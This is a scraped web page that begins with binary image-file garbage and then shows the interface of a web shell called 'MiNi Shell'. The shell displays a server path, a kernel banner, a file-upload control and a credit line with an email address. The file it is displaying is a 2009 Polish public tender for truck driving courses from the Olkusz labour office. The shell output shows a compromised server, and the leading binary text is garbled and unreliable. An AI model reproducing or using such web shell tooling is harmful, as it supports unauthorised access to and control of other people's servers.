JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090522/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090522/161820-N-2009.html

<p class="kh_header"><b>Olkusz: Zorganizowanie i przeprowadzenie usługi szkolenia  dla 32 osób z Funduszu Pracy w tym :
- dla 20 osób kurs prawa jazdy kat. C,  
- dla 12 osób kurs prawa jazdy kat. C + E,   
w ramach środków Funduszu Pracy</b><br>
<b>Numer ogłoszenia: 161820 - 2009; data zamieszczenia: 22.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Minkiewicza 2, 32-300 Olkusz, woj. małopolskie, tel. 032 6434348, faks 032 6430538.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.olkusz.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie usługi szkolenia  dla 32 osób z Funduszu Pracy w tym :
- dla 20 osób kurs prawa jazdy kat. C,  
- dla 12 osób kurs prawa jazdy kat. C + E,   
w ramach środków Funduszu Pracy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Zorganizowanie i przeprowadzenie usługi szkolenia dla 32 osób  z Funduszu Pracy w tym :
   - dla 20 osób kurs prawa jazdy kat. C, w dwóch 10 -cio osobowych grupach    C 
   - dla 12 osób kurs prawa jazdy kat. C + E, w jednej 12 - to osobowej grupie     
w ramach środków Funduszu Pracy, w trybie przetargu nieograniczonego - art. 39 ustawy z dnia 29 stycznia 2004r.- Prawo zamówień publicznych ( Dz. U. z 2007r.  Nr 223, poz.1655 z póź.zm).
1.1. Zamówienie ma być przeprowadzone zgodnie  z programem szkolenia, który powinien uwzględniać  zróżnicowany poziom  umiejętności  i wiedzy uczestników kursu.
1.1.1. Dla 20 osób skierowanych przez Powiatowy Urząd Pracy w Olkuszu na kurs prawa jazdy kat. C liczba godzin ma wynosić co najmniej 50 godzin  na jednego kursanta w tym :
- dla zajęć teoretycznych nie może być mniejsza niż 20 godz. (godzina szkolenia  teoretycznego równa  
  się 45 minutom. ) 
- dla zajęć praktycznych  nie może być mniejsza niż 30 godz. (godzina szkolenia  praktycznego równa 
  się 60 minutom.).

oraz 1 godz. egzaminu wewnętrznego( jedna godzina egzaminu równa się 60 minut).

1.1.2. Dla 12 osób skierowanych przez Powiatowy Urząd Pracy w Olkuszu na kurs prawa jazdy kat. C + E  liczba godzin ma wynosić co najmniej 45 godzin na jednego kursanta w tym :
- dla zajęć teoretycznych nie może być mniejsza niż 20 godz.(godzina szkolenia  teoretycznego równa   
   się 45 minutom. ) 
- dla zajęć praktycznych  nie może być mniejsza niż 25 godz. (godzina szkolenia  praktycznego równa 
   się 60 minutom.).	

oraz 1 godz. egzaminu wewnętrznego( jedna godzina egzaminu równa się 60 minut).

1.2. Szkolenie osób  ubiegających się o  wydanie uprawnienia do kierowania  pojazdami kat. C, i kat. C + E  musi być przeprowadzone w zakresie  i wymiarze  wynikającym z  programu szkolenia kandydatów na kierowców stanowiącym Załącznik nr 3 do Rozporządzenia Ministra  Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania  i uzyskiwania uprawnień  przez kierujących  pojazdami instruktorów i egzaminatorów ( Dz. U. z 2005r. Nr 217   
poz. 1834 z późniejszymi zmianami).
1.3. Celem szkolenia  jest przygotowanie osób do kierowania pojazdami samochodowymi w sposób nie zagrażający bezpieczeństwu i porządkowi ruchu oraz przygotowanie do złożenia egzaminu państwowego w Wojewódzkim Ośrodku  Ruchu Drogowego z prawa jazdy kat C, prawa jazdy kat. C + E.
Program szkolenia powinien być tak  skonstruowany aby zapewnić jak najwyższą jakość szkolenia oraz profesjonalne przygotowani  uczestników. 
1.4. Program szkolenia powinien zawierać w szczególności:
a)nazwę i zakres szkolenia,
b)czas trwania i sposób organizacji szkolenia,
c)wymagania wstępne  dla uczestników szkolenia,
d)cele szkolenia,
e)plan nauczania  określający  tematy  zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem  części teoretycznej i części praktycznej,
f)treści  szkolenia  w zakresie poszczególnych zajęć edukacyjnych,
g)wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
h)sposób sprawdzania efektów szkolenia.
1.5. Zajęcia muszą odbywać się w pomieszczeniu/ach/ dostosowanym/ych/ do prowadzenia zajęć szkoleniowych i odpowiednio w tym celu wyposażonym/ych tj. w pomieszczeniach posiadających odpowiednie warunki  sanitarne, bezpieczeństwa, akustyczne i jakościowe. 
1.6. Wykonawca  podczas trwania szkolenia  zapewni prawidłowe  warunki pracy  zgodne z przepisami BHP i p.poż
1.7.Wymaga się prowadzenia dokumentacji przebiegu szkolenia stanowiącej:
a)dziennik zajęć edukacyjnych zawierający listę obecności, wymiar godzin  i tematy zajęć edukacyjnych,
b)protokół z egzaminu,
c)rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji.
1.8.Wymaga się prowadzenia dla każdego uczestnika szkolenia Karty  przeprowadzonych zajęć zgodnie ze wzorem stanowiącym załącznik nr 2 do Rozporządzenia Ministra Infrastruktury  z dnia 27 października 2005r./Dz. U. Nr 217 poz.1834 z późn. zmianami/.
1.9. Po zakończeniu szkolenia Wykonawca  zobowiązany jest  przeprowadzić   egzamin wewnętrzny, potwierdzający  zdobytą wiedzę  teoretyczną i praktyczną, a następnie  wydać zaświadczenia o ukończeniu  szkolenia zgodnie ze wzorem  stanowiącym załącznik nr 4 do Rozporządzenia Ministra Infrastruktury   z dnia  27 października 2005r.  w sprawie  szkolenia, egzaminowania  i uzyskiwania uprawnień  przez kierujących  pojazdami, instruktorów  i egzaminatorów 
 ( Dz.U.z 2005r. Nr 217, poz.1834 z póź. zmianami).
1.10. Szkolenia powinny być przeprowadzone przez doświadczoną i wykwalifikowaną kadrę,posiadającą odpowiednie wykształcenie i doświadczenie zawodowe.
1.11. Każdemu z uczestników szkolenia powinny być przekazane nieodpłatnie materiały biurowe i szkoleniowe typu:
a)zeszyt,
b)długopis,
c)skrypty,
d)materiały do ćwiczeń.
 Materiały szkoleniowe przekazywane  uczestnikom szkolenia powinny być adekwatne do treści szkolenia. Materiały wykorzystywane podczas realizacji szkolenia powinny być przekazywane uczestnikom szkolenia na początku szkolenia bądź na bieżąco zgodnie z realizowanym tematem zajęć. 
1.12. Uczestnicy szkolenia powinni być objęci opieką z ramienia instytucji szkoleniowej. Każde szkolenie powinno mieć swojego opiekuna, osobę odpowiedzialną za organizację i realizację szkolenia, wskazaną do kontaktu w umowach  stanowiących załączniki nr 7a i 7b do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1.1. posiadają uprawnienia do wykonywania określonej działalności lub czynności objętych przedmiotem postępowania tj.:
-  posiadają aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do  rejestru lub zgłoszenia do ewidencji działalności gospodarczej (np. wpis do ewidencji działalności gospodarczej, wpis do KRS,), 
-  posiadają aktualny wpis do rejestru instytucji szkoleniowych prowadzony przez właściwy Wojewódzki Urząd Pracy /zgodnie z art. 20  ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity Dz. U. z 2008r. Nr 69 poz. 415 z późn.zm.)instytucja szkoleniowa oferująca szkolenia dla bezrobotnych i poszukujących pracy może uzyskać zlecenie finansowane ze środków publicznych na prowadzenie tych szkoleń po wpisie do rejestru  
instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę  instytucji szkoleniowej,
 -  posiadają zaświadczenie potwierdzające  wpis przedsiębiorcy do  rejestru przedsiębiorców prowadzących ośrodki szkolenia kierowców prowadzonego przez właściwego miejscowo starostę, zgodnie ze wzorem  stanowiącym  Załącznik nr 2 do Rozporządzenia  Ministra Infrastruktury z dnia 7 września 2004r.  w sprawie  wzoru wniosku  o wpis do rejestru przedsiębiorców  prowadzących ośrodki szkolenia kierowców oraz wzoru zaświadczenia potwierdzającego wpis przedsiębiorcy do tego rejestru   ( Dz. U. z 2004r.  Nr 205, poz.2097  z późn. zmianami ),
1.2. posiadają niezbędną wiedzę i doświadczenie: w postępowaniu może wziąć udział Wykonawca,który wykaże się przeprowadzeniem z należytą starannością, co najmniej  jednego szkolenia kat.  C i co najmniej 1 szkolenia kat. C + E, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres  prowadzenia  działalności jest krótszy  - w tym okresie -  o tematyce  tożsamej  z  przedmiotem zamówienia tzn. należy uwzględnić tylko kursy kat. C i C+E.
1.3. dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, z których każda musi posiadać co najmniej :
a) legitymacje instruktorów,
b) uprawnienia lekarza systemu, pielęgniarki systemu, ratownika medycznego.
1.4. dysponują potencjałem technicznym umożliwiającym  realizację przedmiotu zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego umożliwiającego realizację przedmiotu zamówienia,                       
Każdy z uczestników szkolenia powinien  mieć indywidualny  dostęp do sprzętu   
wykorzystywanego przy realizacji szkolenia. 
Wymagane jest, aby warunki techniczne jakimi dysponuje wykonawca tj. posiadane pojazdy, plac manewrowy były zgodne z  Rozporządzeniem Ministra Infrastruktury   z dnia 27października 2005r. w sprawie szkolenia, egzaminowania  i uzyskiwania    
uprawnień przez  kierujących  pojazdami instruktorów i egzaminatorów /Dz. U. z 2005r.Nr 217 poz. 1834 z  późn. zmianami/.
1.5. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
1.6. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ust. 1 i  2 w/w ustawy,
1.7. w postępowaniu może wziąć udział Wykonawca, który zagwarantuje zorganizowanie szkolenia, na terenie województwa  małopolskiego lub województwa śląskiego. odległość z  miejscowości, gdzie zostanie przeprowadzone szkolenie  do miejscowości będącej  siedzibą Zamawiającego nie przekracza 50 km i istnieje  bezpośrednie połączenie  ( autobusem, busem, pociągiem )z miejscowości gdzie będzie  przeprowadzone szkolenie do miejscowości  będącej siedzibą Zamawiającego.


Zamawiający wyklucza możliwość prowadzenia szkolenia metodą  e- learning.

W przypadku ubiegania się wspólnie przez Wykonawców o udzielenie zamówienia:
-Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu 
 o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,
-Warunki udziału w postępowaniu określone w pkt 5.1.1, 5.1.6, 5.1.7. SIWZ powinien spełniać każdy Wykonawca z osobna, 
-Warunki udziału w postępowaniu określone w pkt  5.1.2, 5.1.3 ,5.1.4, 5.1.5.SIWZ Wykonawcy mogą   spełniać łącznie. 

Ocena spełniania warunków udziału w postępowaniu będzie przeprowadzona w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia potwierdzające ich spełnienie zgodnie z formułą  spełnia / nie spełnia. Nie spełnianie jakiegokolwiek z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z  dnia 29 stycznia 2004r. Prawo zamówień publicznych:
1.1.1. Oświadczenie Wykonawcy o spełnieniu warunków określonych w  art. 22 ust.1 i nie podleganiu wykluczeniu z art. 24 ust.1 i 2  ustawy Prawo  zamówień publicznych  stanowiące załącznik nr 3 SAIWZ, przedstawione w formie oryginału i podpisane przez Wykonawcę lub osobę upoważnioną do podpisania oferty.
1.1.2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do  rejestru lub zgłoszenia do ewidencji działalności gospodarczej (np. wpis do ewidencji   działalności gospodarczej, wpis do KRS,). Dokument powinien być przedstawiony w formie kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną do podpisania oferty.
 Odpis lub zaświadczenie powinno być wystawione nie wcześniej  niż 6 miesięcy  przed upływem terminu składania ofert.            
1.1.3. Wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej zgodnie z art.20 ustawy  z dnia 20  kwietnia 2004r.o promocji zatrudnienia i instytucjach rynku pracy i  Rozporządzeniem MG i P z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych.
           
Instytucje szkoleniowe, które dokonały wpisu przed 2009r. winny złożyć zaświadczenie  potwierdzające kontynuację  działalności szkoleniowej w roku bieżącym lub oświadczenie potwierdzające kontynuację działalności szkoleniowej w bieżącym roku. 
Dokumenty powinny być przedstawione w formie kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę  lub osobę upoważnioną do podpisania oferty.
1.1.4. Zaświadczenie  potwierdzające wpis przedsiębiorcy  do rejestru przedsiębiorców prowadzących ośrodki szkolenia kierowców prowadzonego przez właściwego miejscowo starostę, zgodnie ze wzorem  stanowiącym  załącznik nr 2 do Rozporządzenia  Ministra Infrastruktury z dnia 7 września 2004r.  w sprawie  wzoru wniosku  o wpis do rejestru przedsiębiorców prowadzących  ośrodki szkolenia kierowców oraz wzoru zaświadczenia potwierdzającego wpis przedsiębiorcy do tego rejestru /Dz. U. z 2004r.  Nr 205, poz.2097  z późn. zmianami/.   
 Dokumenty winny być przedstawione w formie kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę  lub osobę upoważnioną do podpisania oferty.
1.2.  W przypadku  Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. wspólnicy spółki cywilnej lub członkowie konsorcjum ) należy złożyć następujące  dokumenty :
1.2.1. Pełnomocnictwo ustanawiające pełnomocnika do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zawierające umocowanie do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i do zawarcia umowy.   
Pełnomocnictwo powinno być  złożone w oryginale  lub w formie kserokopii potwierdzonej notarialnie.
1.2.2. Dokumenty, o którym mowa w punkcie 6.1.1., 6.1.2., 6.1.3 i 6.1.4  SIWZ   składane dla każdego  z wykonawców wspólnie ubiegających się o udzielenie zamówienia.
1.3.    W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez  Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć: 
1.3.1. Wykaz osób i podmiotów, którymi dysponuje lub będzie dysponował Wykonawca i które  będą uczestniczyć w wykonywaniu zamówienia na załączniku nr 5 do SIWZ.    
Wykaz powinien zawierać informacje na temat wykształcenia oraz doświadczenia    
 zawodowego, a także zakresu  wykonywanych  czynności. Kadra uczestnicząca  w wykonaniu zamówienia  musi   spełniać wymagania,  o których mowa w pkt  5.1.3  SIWZ.  
Ponadto należy złożyć:
-  CV wykładowców,
-  potwierdzone za zgodność ksero dokumentów dotyczących uprawnień instruktorskich,o których mowa w § 65 Rozporządzenia  Ministra Infrastruktury z dnia  27 października  2005r. w sprawie  szkolenia, egzaminowania i uzyskiwania uprawnień  przez kierujących  pojazdami, instruktorów i egzaminatorów /Dz. U. z 2005r. Nr 217, poz.1834 z późn. zmianami /,
- dokumenty stwierdzające, że osoby które będą  uczestniczyć w  wykonaniu zamówienia, posiadają wymagane uprawnienia tzn. uprawnienia lekarza systemu lub pielęgniarki systemu lub ratownika medycznego, o których mowa w  art. 8 ust.2  ustawy z dnia 8 września 2006r. o Państwowym Ratownictwie Medycznym /Dz. U. Nr 191, poz. 1410 z późniejszymi zmianami/. Wykonawca przedkłada te dokumenty w stosunku do osób  wskazanych przez Wykonawcę, jako osoby  realizujące  szkolenie w zakresie udzielania  pierwszej pomocy.   
 Wymogi te  zostały  określone  w  art.105 ust.3  ustawy  z dnia 20 czerwca  1997r. Prawo o ruchu drogowym ( Dz. U.  z 2005r. Nr  108, poz. 908 z późniejszymi zmianami).

Nie należy przedstawiać listy wszystkich wykładowców zatrudnionych przez Wykonawcę, tylko wykładowców przewidzianych do realizacji szkolenia Kurs prawa jazdy kat. C i Kurs prawa jazdy kat. C+E.
Jeżeli Wykonawca  wskaże osoby, którymi będzie dysponował zobowiązany jest złożyć  pisemne zobowiązanie  innych podmiotów  do udostępnienia  osób zdolnych do wykonania  zamówienia.
1.3.2 Wykaz niezbędnych do wykonania zamówienia narzędzi, urządzeń i sprzętu, którymi dysponuje lub będzie dysponował  Wykonawca - załącznik nr 11 do SIWZ.
Jeżeli Wykonawca  wskaże urządzenia i sprzęty , którymi będzie dysponował zobowiązany jest złożyć  pisemne zobowiązanie  innych podmiotów  do udostępnienia  niezbędnych  do wykonania  zamówienia urządzeń i sprzętu.
        Nie należy  wymieniać narzędzi, urządzeń  i sprzętu, który nie  ma  bezpośredniego związku z realizacją zamówienia, a znajduje się, bądź będzie się znajdował na  wyposażeniu bazy lokalowej.
1.3.3. Załącznik nr 6 do SIWZ - wykaz wykonanych szkoleń w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres  prowadzenia działalności jest krótszy  -   w tym okresie -  o tematyce  tożsamej z  przedmiotem zamówienia tzn. należy uwzględnić  tylko kursy kat. C i kat C +E.
      
Ponadto należy dołączyć  dokumenty potwierdzające , że usługi zostały wykonane należycie np. referencje, pochwały itp. ( z wyłączeniem  dokumentów wystawionych Wykonawcy  przez Zamawiającego tj. PUP Olkusz) w oryginale lub w formie kserokopii potwierdzonych za  zgodność z oryginałem podpisanych przez  osobę uprawnianą.				                       	
Należy dołączyć  dokumenty poświadczające należyte wykonanie  zamówień od co najmniej jednego  Zamawiającego, u którego Wykonawca  realizował zamówienie z zakresu prawo jazdy kat. C i co najmniej jednego Zamawiającego, u którego Wykonawca  realizował zamówienie z zakresu prawo jazdy kat. C+E ( z wyłączeniem  dokumentów  wystawionych Wykonawcy  przez  Zamawiającego tj. PUP Olkusz).
      
1.4.  W celu potwierdzenia, że Wykonawca  znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć:
1.4.1. Pisemne oświadczenie o nie zaleganiu z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne stanowiące załącznik nr 8 SIWZ,    
przedstawione w formie oryginału i podpisane przez Wykonawcę lub inną osobę upoważnioną do podpisania oferty. Zamawiający może żądać na wniosek okazania w/ w dokumentów w ciągu 14 dni. W przypadku zażądania przez Zamawiającego w/ w dokumentów winny one być  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.    
 1.5. Pisemne oświadczenie o zagwarantowaniu zorganizowania szkolenia na terenie województwa małopolskiego lub województwa śląskiego. Odległość z  miejscowości gdzie zostanie  przeprowadzone szkolenie do miejscowości będącej siedzibą Zamawiającego nie  przekracza 50 km i istnieje bezpośrednie połączenie ( autobusem, busem lub pociągiem ) z miejscowości gdzie zostanie przeprowadzone  szkolenie do miejscowości będącej siedzibą Zamawiającego, stanowiące załącznik nr 9  do SIWZ, przedstawione w formie oryginału i podpisane przez Wykonawcę lub inną osobę upoważnioną do podpisania oferty.
1.6. W przypadku kiedy Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej należy złożyć:
1.6.1. Zamiast dokumentów, o którym mowa w pkt 6.1.2.SIWZ -  dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.6.2. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub  miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Daty wystawienia stosuje się odpowiednio.
1.6.3.Jeżeli dokumenty wyżej wymienione Wykonawca składa  w języku obcym, należy również złożyć  tłumaczenie na język polski, poświadczone przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 70</li>
<li>2 - doświadczenie - 30</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pup.olkusz.info.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Olkuszu
ul. Minkiewicza 2 
32 -300 Olkusz.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2009 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Olkuszu
ul. Minkiewicza 2 
32 -300 Olkusz
POKÓJ NR 8 (SEKRETARIAT).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com